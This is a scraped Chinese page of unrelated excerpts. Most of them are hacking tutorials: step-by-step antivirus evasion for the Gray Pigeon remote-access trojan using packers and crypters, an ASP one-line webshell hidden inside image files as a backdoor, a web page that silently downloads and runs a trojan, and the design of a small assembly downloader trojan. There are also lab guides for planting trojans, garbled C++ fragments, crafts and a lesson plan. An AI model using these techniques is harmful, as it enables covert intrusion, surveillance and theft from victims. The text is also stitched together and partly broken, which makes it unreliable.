制作免杀木马用工具更轻松等

制作免杀木马用工具更轻松等

制作免杀木马用工具更轻松Blovlg

木马如果不做免杀处理，很容易被杀毒软件清除，虽然现在木马免杀的方法有很多，但几乎每种免杀方法公布后，都逃不过杀毒软件的眼睛。今天要介绍的方法经过测试可以顺利逃过主流杀毒软件的查杀，希望可以给那些还在寻找免杀木马的朋友带来一点福音。

这里主要利用工具制作免杀木马，比较适合小菜，用到的工具有：1、Restorator.exe。2、MaskPE 2.0最终版.exe。3、RPolyCrypt.exe。4、SimplePack.exe。5、vmprotect.exe。这些工具在网上都可以找到。

我们拿著名的灰鸽子木马做实验，配置灰鸽子大家都会了吧，我这里用的是黑防版。配置完毕以后用Restorator.exe 打开，把HACKER部分的大写字母改成小写的，你可以多修改一些代码这样效果会更好一些，改完后保存退出，这一步骤是躲过杀毒软件的表面查杀。

打开MaskPE2.0最终版exe，点击“LoadFile”按钮，载入灰鸽子服务端后。直接点击“Make File”按钮输入生成的文件名如1.exe。

打开SimplePackexe，托动1.exe到界面中。选中“压缩

资源”复选框，然后点击“压缩”。

用RPolyCrypt.exe直接处理1.exe，默认设置不用改，直接点击左边的按钮就可以了。

最后打开vmproteot.exe，载入1.exe点击“Next”，的界面，点“Add>”再点“Next”弹出确定框，点击“OK”。直到最后要注意，把“Execute"C:\......"”这个复选框去掉，要不然的话，自己做的免杀鸽子就会在自己的机器上运行了，那样的话就惨了!

经过这样的一番加工，你的免杀版灰鸽子就完成了，而且绝对可以躲过最新的杀毒软件查杀，大家可以试试。告诫大家不要做坏事啊。另外免杀方法公布出来就离死不远了，我这里只是抛砖引玉，希望大家多实践找到一种自己的免杀方法。

如何访问被封锁的网站?李红

由于某种原因，电信的DNS封锁了国外的一些网址，所以不要用电信的DNS去解析域名，自己手动添加国外DNS 服务器地址。设置步骤如下：

1点击“开始／设置／控制面板／网络连接”，右击“宽带”下的自定义连接，选择“属性”，然后点击“网络”，再双击“Internet协议(TCP/IP)”，点“使用下面的DNS服务器

地址”，在“首选DNS服务器”和“备用DNS服务器”中分别填人两个国外DNS地址(例如151.203.0.85和

168.95.1.1)，最后点击“确定”退出；

2最后重启电脑，打开浏览器，检查能否正常浏览普通的国内外网站，如果不行，重复上面的步骤，选择另外的国外DNS地址重新设置，直到浏览器能正常浏览普通的国内外网站为止。

远程管理特洛伊木马(RAT)病毒

远程管理特洛伊木马（RA T）病毒 远程管理特洛伊木马（rat）病毒 rats the world of malicious software is often pided into two types: viral and nonviral. viruses are little bits of code that are buried in other codes. when the “host” codes are executed, the viruses replicate themselves and may attempt to do something destructive. in this, they behave much like biological viruses. worms are a kind of computer parasite considered to be part of the viral camp because they replicate and spread from computer to computer. a s with viruses, a worm”s malicious act is often the very act of replication; they can overwhelm computer infrastructures by generating massive numbers of e-mails or requests for connections that servers can”t handle. worms differ from viruses, thou gh, in that they aren”t just bits of code that exist in other files. they could be whole files--an entire excel spreadsheet, for example. they replicate without the need for another program to be run. remote administration types are an example of another kind of nonviral malicious software, the trojan horse, or more simply trojan. the purpose of these programs isn”t replication, but to penetrate and control. that masquerade as one thing when in fact they are something else, usually something destructive. there are a number of kinds of trojans, including spybots, which report on the web sites a computer user visits, and keybots or keyloggers, which record and report the user

远控、木马

远控、木马？神马都是浮云！ 供稿：VIRUSFREE 年初，中央电视台的《焦点访谈》专门介绍了黑客如何危害大众的事，给人的感觉是黑客软件在利益的趋势下，有愈演愈烈的趋势，而普通用户的电脑沦为黑客们的“肉鸡”，只有被人任意宰割的份了。 为什么会这样？这还得从黑客软件的原理说起。 黑客软件，也称远控软件，是一种特殊的软件，合法的用途是用于远程维护电脑，能增加工作效率、降低劳动成本，但在黑客手里，就演变成为控制用户电脑，盗窃用户电脑资源的后门，用户电脑一旦被植入这种东东，什么游戏装备、QQ密码、银行支付帐号、股票账户、机密文档，都会成为黑客的囊中之物，除此之外，若干台被控电脑还可以组成“僵尸”网络，成为犯罪分子攻击别人电脑网络或者运行系统的帮凶，所以，电脑被黑客控制是非常危险的事情。 有人要说了，我的电脑安装了杀毒软件，还有防火墙，难道就防不住这些黑客软件？！ 是的，基于杀毒软件的工作原理，黑客们使用各种“免杀”技术，就能逃避杀软的查杀，达到入驻用户电脑的目的。他们为了达到长期霸占用户电脑的目的，还使用了随时更新远控端程序的技术，目的只有一个，让杀软永远发现不了它们。 无毒空间的诞生，基本是敲响了这类黑客软件的丧钟，其原因是，那些在杀软面前非常牛的“免杀”技术，在无毒空间面前无疑于自投罗网，无毒空间的工作原理跟黑客软件的“免杀”技术是完全相克的，所以，只要用户电脑的无毒空间还在正常工作，抓黑客软件、后门程序就如同“瓮中捉鳖”一样非常容易。 以下案例就显示无毒空间抓住各类黑客软件的样子。

首先试试灰鸽子这个经典的远控，我们将灰鸽子的最新版找来测试了一下，老版本就不一一试验了，从原理上看，都应该不在话下。 这个截图显示的是灰鸽子进入用户电脑的情形，我们为了测试这个木马，故意没有搭理它，如果第一时间就禁止这些可疑程序，我们也就看不到后面的精彩镜头了。 图1 重启电脑，当作不知道木马已经进入我们电脑的样子。

木马制作原理

启动C++Builder企业版，新建一个工程，添加三个VCL控件：一个是In ternet 页中的Server Socket，另两个是Fas tn et页中的NMFTP^ NMSMTPServer Socket 的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol 文件传输协议）和SMTP（Simple Mail Transfer Protocol 简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 Form 窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form 就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。 我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木 马在Win9x 的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service 的后台进程, 它可以运行在较高的优先级下, 可以说是非常靠近系统核心的设备驱动程序中的那一种。因此 , 只要将我们的程序在进程数据库中用RegisterServiceProcess （）函数注册成服务进程（Service Process ）就可以了。不过该函数的声明在Borland 预先打包的头文件中没有,那么我们只好自己来声明这个位于中的鸟函数了。 首先判断目标机的操作系统是Win9x 还是WinNt： { DWORD dwVersion = GetVersion （）; _str （）, AnsiString （SystemPath+"\\\\" ）.c_str （）,FALSE ）; .） { _str （））; _str （））; _str （）; nsiLastChar （）!=\'\\\\\' ） _str （）; _str （）; uid ）; ttributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges （hToken, FALSE, &tkp , 0 ,（PTOKEN_PRIVILEGE）SNULL, 0）; .） { goto NextTime; .） { return; 1 ” 2” 0L. Y ............ #define DestNum 1000 =random（ItemWidth）;

汇编制作木马

现在很多单位都采用单独的计算机来存放重要的涉密文件。然而如果涉密文件被盗，不仅会带来严重的经济损失，窃密者还可能逍遥法外。为了解决这个问题，我们需要对涉密文件采取某些措施：如绑定木马，在窃密者在得手后木马能自动执行，并记录下窃密者的相关信息，最后及时通知监控端。上面所采取的措施，我们称为网络跟踪技术。本文所要讲述的汇编木马，就经常应用在跟踪技术中。 举个例子：在一涉密.Doc文件中绑定一个.Exe木马。如果木马功能复杂，并且是在VC等编译环境下生成，那它的体积至少有几十K，再加上.Doc文件自身的数据量就非常可观了。一个大的.Doc文件会引起窃密者的怀疑，我们的跟踪也就达不到效果。因此，我们势必要设法在不影响最终目的的前提下，尽量减小木马文件的体积。办法可能不止一个，而我采用的是编写汇编木马的方式。当然，研究的平台都是在Windows2000以上的操作系统中。 Win32汇编木马设计思路 完整的汇编木马又称为“小马”，原因有两个：一是它体积小，只有几K；二是它的功能仅仅是反向连接攻击端，从攻击端下载并执行真正的功能复杂的木马（大马）。为了便于大家理解，本文将不关心“大马”的功能实现，重点是提出汇编木马的设计思路，并尽量从基础的角度进行讨论。 汇编木马的设计围绕4个重要的技术指标：体积小、防杀、突破防火墙与进程隐藏、拖动并执行“大马”， 下面逐一介绍： 1、体积小。常规木马大多用高级语言编写，在集成环境下编译生成。虽然

实现方便，但是生成的.Exe文件体积较大。对于汇编木马，我们采用Win32汇编来实现，使得.Exe文件体积控制在几K。 2、防杀。为了避免被诺顿、卡巴斯基、江民等主流杀毒软件所识别，木马文件一定要进行可靠的加壳处理。根据经验，一般我们选用最新的ASProtect，加壳后的.Exe文件生存能力一般比较强。如果需要，在必要的时候还可以手动修改文件特征码。 3、突破防火墙与进程隐藏。木马文件执行的时候需要与攻击端通信，必须访问网络。但不仅第三方的个人防火墙会阻拦你，现在Windows XP SP2也自带了软件防火墙。当“不可信任”的应用程序访问网络时，防火墙会报警。我的解决方法是：将网络通信部分的代码作为远程线程注入到防火墙“可信任”的进程中。这个“可信任”的进程一般是系统进程，也可以是IE。代码的注入，同时起到了进程隐藏的作用。 4、拖动并执行“大马”。这是汇编木马的核心功能，也是本文要重点举例讨论的内容。最终的监控、跟踪功能是在“大马”中实现的，它可以通过高级语言来实现，体积大小并没有什么限制。 Win32汇编基础 为了进行下面的讨论，Win32汇编是大家必须掌握的基础知识。Win32汇编生成的程序也是运行在Windows保护模式下的。我们可以通过下面几个方面去了解： 1、Win32ASM编译器 Win32ASM编译器最常用的有两种：Borland公司的Tasm5.0和Microsoft的Masm6.11及以上版本，两种编译器各有自己的优缺点，本文选用Microsoft

一句话木马图片制作(三种方法)

图片木马制作的三种方法Copy命令制作 1.asp内容： 打开cmd，数据一下命令：

此时打开两个jpg文件，相比： 且打开可以像一样显示图像。 把以下代码放入目标网站，即可按asp执行。<% #include files=””%> Uedit32（转载）：

本制作来自于：雪糕。 我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误： Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配: 'execute' /news1/，行 3 所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码： 这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。 新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。 制作步骤： 一、前期准备 材料： 1.一张图片：

2.一句话木马服务器端代码： <%execute request("value")%>（其他的一句话也行） 3.一句Script标签： 4. 调用图片后门代码： 工具：UltraEdit

16个生活中很实用的简单小制作

16个生活中很实用的简单小制作个生活中很实用的简单小制作16

1、自制羽毛球准备材料：空饮料瓶一只，泡沫水果网套两只，橡皮筋一根，玻璃弹子一只。制作过程：1.取250毫升空饮料瓶一只，将瓶子的上半部分剪下；2.将剪下的部分均分为8份，用剪刀剪至瓶颈处，然后，将每一份剪成大小一致的花瓣形状；3.将泡

沫水果网套套在瓶身外，用橡皮筋固定在瓶口处；4.将另一只泡沫水果网套裹住一粒玻璃弹子，塞进瓶口，塞紧并露出1厘米左右； 5.剪下半只乒乓球，将半球底面覆在瓶口上，四边剪成须状，盖住瓶口后用橡皮筋固定住。 6.美化修饰后，一只自制羽毛球完成了。用、自制香2羽毛球拍打一打，看看效果怎么样？ 皂纸制作材料和工具：吸湿性较好的白纸，小块香皂，一支毛笔和一次性饮料罐。制作方法：

先把香皂切碎后放在罐里，盛上适量的水后把杯子放在炉上加热，等香皂融化，将白纸裁成火柴盒大小，一张张涂透皂液，再取出阴干就成了香皂纸。3、自制热气球1.首先我们用软纸裁出6～8个叶状的纸片。2.将它们对折并用胶水将它们的边粘在一起作成一个气球。3.用胶带将四根连线粘到气球

底部。用橡皮泥将线的另外一端固定在桌子上。4.尽量将电吹风的速度调的很慢。将吹风口向上对准底部的开口并且打开开关。气球会慢慢变大拉紧细线并且离开桌面。4、自制手电筒具体制作方法是：将一只废易拉罐（如露露饮料罐）起掉一头盖子，另一头用圆头榔头敲凹。用厚瓦楞纸板卷起两节一号电池，电池正极朝 上、负极朝下装入罐中。找一个合适的塑料盖（如神奇大大卷的盒盖正好可以扣在露露饮料罐

上），在盒盖中央挖一个圆形小洞，洞的大小以使灯泡插紧为宜。将灯泡底座插入小洞。取一段寻线两端剥去线皮，一端绕在灯座上，另一端从塑料盖侧面扎一个小孔穿出。将塑料盖盖在易拉罐上。检查一下，灯泡、电池是不是紧密接触。到这里一次性手电筒就做好了。使用时，用大拇指把从侧壁穿出的导

(完整word版)手工制作教案

《手工》校本课程计划与教案 授课教师：杨敏 授课对象：四年级学生 授课时间：每周五校本课程 手工方课程的开设是对课堂教学的补充和延伸，与课堂教学相比更具灵活性、可塑性，因而学生非常乐意参加。地方课程的开设，在于培养学生对美术的兴趣、爱好、增长知识、提高技能、丰富学生的课余文化生活，为今后培养美术人才起着积极推动的作用。现将本学期美术小组的活动安排制定如下： 一、活动目的 本学期开设的手工地方课程活动为一部分有特长爱好的学生提供一个展示个性才艺的机会和空间，使他们的一技之长得到充分的发挥和展示，以点带面，促进全校的美术活动。进一步了解美术的基本知识，提高学生的欣赏水平及创造能力。同时让学生在活动中体验创作的乐趣。 二、活动要求 1、组织学生按时参加活动，并保持室内清洁。 2、每周五下午第二节课开始活动，小组成员必须准时到达美术室。 3、美术小组成员应严格遵守纪律，不准在美术室大声喧哗，不准做与美术学习无关的事。 4、每次老师布置的作业，学生都应按时完成。 5、爱护美术教室内的设施和用品。 三、活动内容

1、以小组合作的形式进行平面剪贴和立体手工制作 2、卡纸和生活中的废旧物品均可作为创作材料 3、给学生自己创作作品的时间和空间。 4、欣赏优秀手工作品，开拓学生眼界。 5、及时用相机拍摄活动内容。（集体或个人） 四、定期举办美术比赛 举办美术展览，交流、回顾、总结学习成果，为同学们提供表现自己实力，增强自信心的舞台能起到意想不到的效果。教师要精心指导，严格把关。学生大胆构思，不拘一格，精心绘制，多出佳作，在校内展出以起到示范作用。 五、备注 附：教学进程和教案 博爱小学地方课程备课（填年度学期） 一、教学进程 有趣的吊饰 教学目标： 1、知识与技能：能表现物象的形态特征；运用剪、对折、粘贴制作吊饰；有目的的排列。 2、过程与方法： （1）在比较中，感受民间饰物造型、色彩、花纹特点； （2）在探索中学习吊饰的设计方法； （3）在“尝试运用”中掌握制作方法。

灰鸽子远程控制软件

灰鸽子远程控制软件 【实验内容】 灰鸽子木马是网络上常见的并且功能强大的远程后门软件。采用dll注入技术，开启服务程序，从而实现远程控制的目的。本实验以灰鸽子木马为例进行木马的制作、种植和攻击。实验原理】 木马，全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出先在希腊神话传说中。一般木马程序都是隐蔽的进程,不易被用户发现。计算机木马程序一般具有以下几个特征： 主程序有两个，一个是服务端，另一个是控制端。服务端需要在主机执行。 当控制端连接服务端主机后，控制端会向服务端主机发出命令。而服务端主机在接受命令后，会执行相应的任务。 灰鸽子是国内一款著名后门软件，是国内后门软件的集大成者。具有丰富而强大的功能、灵活多变的操作、良好的隐藏性。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 【实验环境】 本地主机(WindowsXP)、Windows实验台，灰鸽子客户端软件。 实验的网络拓扑如图3.5.8-8所示，实验目标需首先确定所在主机实验台IP地址，并根据实验步骤填写正确的IP地址进行实验。 Windows实验台 本地主机 图3.5.8-8 【实验步骤】 一、木马制作 启动实验台，并设置实验台的IP地址，以实验台为目标主机进行攻防试验。 (1)在学生客户端，下载木马制作程序，打开客户端程序（可能需退出安全程序），灰 鸽子客户端的操作界面如下图所示。

(2)首先需要配置服务程序。点击“配置服务程序”，出现如下图所示的界面。 图 3.5.8-10 (3)在“自动上线设置”里，填写上“IP通知http访问地址、DNS解析域名或固定IP”, 此时填写学生客户端IP地址，然后设置连接密码，如下图所示。 图 3.5.8-11 (4)为了保证服务端程序运行的隐蔽性，我们可以把“安装选项”里的“安装后自动删 除安装文件”选中；如下图所示。

黑客是如何给我们的系统种上木马的

相信很多朋友都听说过木马程序，总觉得它很神秘、很高难，但事实上随着木马软件的智能化，很多骇客都能轻松达到攻击的目的。今天，笔者就以最新的一款木马程序——黑洞2004，从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是，在使用木马程序的时候，请先关闭系统中的病毒防火墙，因为杀毒软件会把木马作为病毒的一种进行查杀。 操作步骤: 一、种植木马 现在网络上流行的木马基本上都采用的是C/S结构（客户端/服务端）。你要使用木马控制对方的电脑，首先需要在对方的的电脑中种植并运行服务端程序，然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。 二、使用木马 成功的给别人植入木马服务端后，就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术，所以服务端上线后会自动和客户端进行连接，这时，我们就可以操控客户端对服务端进行远程控制。在黑洞2004下面的列表中，随便选择一台已经上线的电脑，然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。 文件管理：服务端上线以后，你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹，并且支持断点传输。简单吧？ 进程管理：查看、刷新、关闭对方的进程，如果发现有杀毒软件或者防火墙，就可以关闭相应的进程，达到保护服务器端程序的目的。 窗口管理：管理服务端电脑的程序窗口，你可以使对方窗口中的程序最大化、最小化、正常关闭等操作，这样就比进程管理更灵活。你可以搞很多恶作剧，比如让对方的某个窗口不停的最大化和最小化。 视频监控和语音监听：如果远程服务端电脑安装有USB摄像头，那么可以通过它来获取图像，并可直接保存为MediaPlay可以直接播放的Mpeg文件；需要对方有麦克风的话，还可以听到他们的谈话，恐怖吧？ 除了上面介绍的这些功能以外，还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能，操作都非常简单，明白了吧？做骇客其实很容易。 3隐藏

网页木马制作全过程(详细)

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页，经检查，我确实中了灰鸽子。怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。 有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示：代码说明 a. 代码中“src”的属性为程序的网络地址，本例中 “https://www.360docs.net/doc/a117393253.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去，但免费空间出于安全的考虑，多数不允许上传exe文件，黑客可能变通一下把扩展名exe改为bat或com，这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间（如图1），然后用没打补丁的IE6打开，接下来，打开IE的临时目录，

冰河木马远程控制

实验2 冰河远程控制软件使用（2学时） 实验目的 本次实验学习冰河木马远程控制软件的使用，通过实验可以了解木马和计算机病毒的区别，熟悉使用木马进行网络攻击的原理和方法，熟悉防范木马的方法。实验环境 装有Windows 2000/XP系统的计算机，局域网或Internet，冰河木马软件（服务器和客户端） 实验内容与步骤 双击冰河木马.rar文件，将其进行解压，解压路径可以自定义。解压过程见图1-图4，解压结果如图4所示。 图1 图2

图3 冰河木马共有两个应用程序，见图4，其中win32.exe是服务器程序，属于木马受控端程序，种木马时，我们需将该程序放入到受控端的计算机中，然后双击该程序即可；另一个是木马的客户端程序，属木马的主控端程序。 图4 在种木马之前，在受控端计算机中打开注册表，查看打开txtfile的应用程序注册项：HKEY_CLASSES_ROOT\txtfile\shell\open\command，可以看到打开.txt文件默认值是c:\winnt\system32\notepad.exe%1。 在受控端计算机中双击Win32.exe图标，将木马种入受控端计算机中，表面上好像没有任何事情发生。我们再打开受控端计算机的注册表，查看打开txt 文件的应用注册项。HKEY_CLASSES_ROOT\txtfile\shell\open\command，可以发现，这时它的值为C:\winnt\system32\sysexplr.exe%1，见图7。

图5 打开受控端计算机的C:\WINNT\System32文件夹，这时我们可以找到 sysexplr.exe文件，如图8所示。 图6 在主控端计算机中，双击Y_Client.exe图标，打开木马的客户端程序（主 控程序）。可以看到如图9所示界面。

手工查杀木马病毒的一般详细步骤

手工查杀木马病毒的一般详细步骤其实，在平时一不小心中病毒或木马的时候，对于高手来说，都采用手动查杀的方式，因为一方面，对于互联网上新出现的病毒或其变种，大多数的杀毒厂商往往都是被动的，这样就给那些病毒木马提供了时间上的有利条件;另一方面，用杀毒软件查杀的话，是很浪费宝贵的时间的，你知道，高手们往往是不会去选择做傻事的，因为他们知道应该在这些傻事 中学到些什么,而对于我们普通菜鸟用户来说，怎么办呢,总不能坐以待毙吧～作为高手是不能容忍的，因此，手工查杀就从中起了重要作用。那么我们应该怎么办呢,我 们应该从中学到些什么呢, 首先，当我们感到机器变得比以前慢很多，或者鼠标有时会不自主的乱抖动，这时我们就应 该考虑是不是病毒或木马在作怪了。 这时，我们的第一步就是打开任务管理器，仔细查看有没有哪些异常或自己尚不清楚的进程，发现后，先不要急着结束它，先用纸和笔记录下来，这时我们可以在网上查下该进程的相关资料(比如*.exe)，这时如果上网不方便的话，可以在资源管理器中按F3打开“搜索”，首先确保将系统中的所有文件全部显示出来，包括重要的系统文件，并“所有文件和文件夹”搜索，看看它到底藏在了哪里，也许有时候你会发现，这个你不熟悉的进程名正是系统中正常的一个程序的进程。不过这也没关系，我们都是从不懂到懂得的一个过程，没什么指得可 笑的。 如果从网上找到的资料里，发现这个确是病毒或木马的话，则毫无疑问的进行下一步骤。如果是在“搜索”中找到的，则右击查看它的属性，看看它是具体什么

时间被建立的，如果与实际不符而相违背的，或明显带有迷惑用户性质的话，则可以肯定它们对我们是不利的。我 们只有将它们赶尽杀绝了!!! 下一步，我们就要毫不留情的在任务管理器中先结束其进程了。右击它选择“结束进程”，“确定”即可。如果中的病毒或木马很强的话，我们就要采取强制的方式结束它了。具体方法:首先“开始——运行”，输入CMD，打开命令提示符。输入“Tasklist”后就会看到我们各个程序的进程列表了，其中有一列叫 PID(进程标识符)的，这对我们强制关闭某个进程 时有用到。 它的命令是这样的:“ntsd -c q -p PID号”。 假如你看到我们刚才记下的可疑进程名，及其后面的PID号是1060(假如)，则可以，在提示符下输入“ntsd -c q -p 1060”就可以了。这是我们的第二步，其实按一般思路，结束可疑进程是第一步，这里，我们把判断作为了一个步骤，然而这对于我们这样的菜鸟来说，准确判断一个进程是不是可疑进程，是不是那么容易的，应该说什么都是靠积累的，如古人 云:不积跬步，无以至千里;不积小流，无以成江海。知识也不例外～ 好了，废话不多说。下一步，我们就要对注册表进行“体检”了，不过新手建议先备份，以防不测，有的菜鸟说，不知道应该备份哪些内容，我说你需要修改哪些内容，你就首先将其备份好，以便系统被我们折腾的崩溃了，^_^，好有后悔药吃。你知道世上本没有后悔药，所以我们每一步都要很小心，这是很重要的。即使电脑老手也有失手的时候，不管做什么。 我好象说多了。。。。。^_^ 对注册表进行编辑，使用regedit或regedt32命令。依次展开并找到以下几项，看有没有

远程控制软件和木马的区别

远控软件和木马的区别 很多人听到远程控制，就想到木马——通过发送一个图片或文档，或者让对方打开一个网址，对方观看后，就可以远程控制对方了。真有这样的软件吗？答案是肯定的，灰鸽子就是其中最杰出的代表（灰鸽子2003年是已经倒闭了的）。 现在就将灰鸽子这类木马软件和网络人远程控制软件之间的区别，以及黑客非法控制他人的手段和正常实现远程控制的方法。 1.首先，无论是用木马还是用正规的远程控制软件，要实现远程操控对方电脑，都需要在被控的电脑上安装一个被控端，如果不安装那么不可能实现控制。灰鸽子、黑洞等木马软件，会将被控端设计成全自动后台运行，点击一下后，被控端可能就消失掉了，其实它已经在后台悄悄的安装了。正规的远程控制软件，比如网络人、PCanyWhere 等被控端的安装符合常规软件的安装流程，有安装界面供客户选择和退出。被控端如果隐藏安装，那么杀毒软件会认为你是木马，如果有安装界面正常安装，并且可以退出、卸载，那么可以认为是正规的远程控制软件。 2.网络人和灰鸽子等木马软件在功能上基本完全相同，都具有文件管理，屏幕监控、视频监控，远程重启、键盘记录、屏幕录像等功能，实施监控的时候，都不会被对方发现。但灰鸽子是木马，会被杀毒软件当作病毒查杀，而网络人是正规的远程控制软件，获得了360、毒霸、瑞星等杀毒软件的安全认证，不会被当作病毒查杀。

3.灰鸽子之类的木马软件，使用起来较麻烦，首先需要用户自己购买FTP 空间或申请域名，费用约250元/一年，并且还很不稳定。然后要在路由器上做端口映射，完成这些前期工作后，还要进行服务端配置，上线设置，技术性很强，一般用户无法轻易学会使用。 4. 网络人是国内第一款穿透内网的远程控制软件，无需做任何设置，也不用进行端口映射，即可实现远程控制。软件分为控制端和被控端两部分，只要在你想控制的电脑上安装一个被控端，填写用户名登陆，并进行简单的设置，今后您在地球上任何地方，以同一个ID 登陆控制端，即可控制对方，简单方便。 5.木马会被当病毒查杀，而网络人不会。木马销售者一般都宣称他们的软件可以逃过杀毒软件的拦截，并且也会给你测试，但实际上那是短暂的，杀毒软件天天升级，它们今天不被杀，不意味着明天不被杀。使用木马控制，非常不稳定，一旦被拦截，就控制不了，而且被对方发现你用木马监控他，可能引发法律纠纷。

实验12 网页木马

特洛伊木马 特洛伊木马（Trojan Horse）又称木马，是一种通过各种方法直接或者间接与远程计算机之间建立起连接，使远程计算机能够通过网络控制本地计算机的程序。这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城，久久无法攻下。于是有人献计制造一只高二丈的大木马，假装作战马神，让士兵藏匿于巨大的木马中，大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后，遂将“木马”作为奇异的战利品拖入城内，全城饮酒狂欢。到午夜时分，全城军民尽入梦乡，匿于木马中的将士开秘门游绳而下，开启城门及四处纵火，城外伏兵涌入，部队里应外合，焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名，有“一经潜入，后患无穷”之意。 通常木马并不被当成病毒，因为它们通常不包括感染程序，因而并不自我复制，只是靠欺骗获得传播。现在，随着网络的普及，木马程序的危害变得十分强大，概括起来，木马的危害有：窃取数据、接受非授权操作者的指令、篡改文件和数据、删除文件和数据、施放病毒、使系统自毁、远程运行程序、跟踪监视对方屏幕、直接屏幕鼠标控制，键盘输入控制、监视对方任务且可以中止对方任务、锁定鼠标键盘和屏幕、远程重启和关机、远程读取和修改注册表、共享被控制端的硬盘等。 远程控制概述。要了解木马，首先应了解远程控制。所谓远程控制，是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段，联通需被控制的计算机，将被控计算机的桌面环境显示到自己的计算机上，通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。这里的远程不是字面意思的远距离，一般指通过网络控制远端电脑。早期的远程控制往往指在局域网中的远程控制而言，随着互联网的普及和技术革新，现在的远程控制往往指互联网中的远程控制。当操作者使用主控端电脑控制被控端电脑时，就如同坐在被控端电脑的屏幕前一样，可以启动被控端电脑的应用程序，可以使用或窃取被控端电脑的文件资料，甚至可以利用被控端电脑的外部打印设备（打印机）和通信设备（调制解调器或者专线等）来进行打印和访问外网和内网，就像利用遥控器遥控电视的音量、变换频道或者开关电视机一样。不过，有一个概念需要明确，那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑，同时将被控端电脑的屏幕画面通过通信线路回传过来。也就是说，控制被控端电脑进行操作似乎是在眼前的电脑上进行的，实质是在远程的电脑中实现的，不论打开文件，还是上网浏览、下载等都是存储在远程的被控端电脑中的。远程控制必须通过网

16个生活中很实用的简单小制作

